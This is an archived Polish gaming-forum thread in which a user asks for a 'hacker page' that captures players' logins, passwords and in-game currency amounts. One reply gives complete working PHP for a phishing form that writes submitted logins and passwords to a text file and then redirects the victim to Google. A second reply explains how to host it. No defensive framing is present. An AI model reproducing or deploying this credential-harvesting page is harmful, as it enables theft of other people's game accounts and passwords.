Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

[Szukam]Stronki hakerskiej (zapisywanie loginu i hasła)


arturi513

Rekomendowane odpowiedzi

Opublikowano

Witam.

 

Chciałbym się zapytać czy ktoś mi zrobi lub wytłumaczy jak zrobić taką stronkę.

Chodzi o takie coś : wchodzę na stronkę i np. podaję hasło, login i ilość yang(lub czegoś tam) i to wszystko mi przychodzi na e-mail.

Stronka nie będzie do tego służyła bo i tak ludzie się juz na to nie nabierają także nie pisać zbędnych komentarzy.

Za pomoc daję limit lajków.

Osoby chętne do pomocy proszę o gg.

 

Jeżeli zły dział to poproszę o przeniesienie w dobry, z góry dziękuję.

Opublikowano

Nie na każdym serwerze bezproblemowo działa wysyłanie maili, ale można łatwo zapisać do pliku.

<?php 
if(!isset($_POST['send'])) {  //Sprawdzasz czy wyslano formularz
echo '<form method="POST" action="index.php"> 
<p><input type="text" name="login" value="Login..."></p>
<p><input type="text" name="password" value="Haslo..."></p>
<p><input type="text" name="yang" value="Kwota yang"></p>
<p><input type="submit" value="Wyslij" name="send"></p>
</form>'; //Jeżeli nie to go wyświetlasz
} 
else  //Jak wyslano to obrabiasz dane
{ 

$file = fopen("save.txt", "a"); //Tworzysz/otwierasz plik: save.txt
flock($file, 2); //Blokujesz
fwrite($file, trim($_POST['login'])." - ".trim($_POST['password'])."\r\n"); //Zapisujesz: login - haslo do pliku, za kazdym razem w nowej linijce
flock($file, 3); //Odblokowywujesz 
fclose($file);    //Zamykasz plik
header("Refresh: 3; url=http://google.com/"); echo "Wyslano!";//Wyswietlasz wiadomosc po wyslaniu formularza i po 3 sekundach przekierowywujesz na inna strone
} 
?>

 

 

Opublikowano

Norkachio - Dal Ci strone w php (Tak jakby), wklej to do notatnika zapisz jako php, wrzuc na jakas strone (ftp), bo tylko tak ktos, i ty bedziecie mogli to otworzyc(No chyba ze przez program). Serwer na strone moesz wykupic na proserwery.

iz9w29.png

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...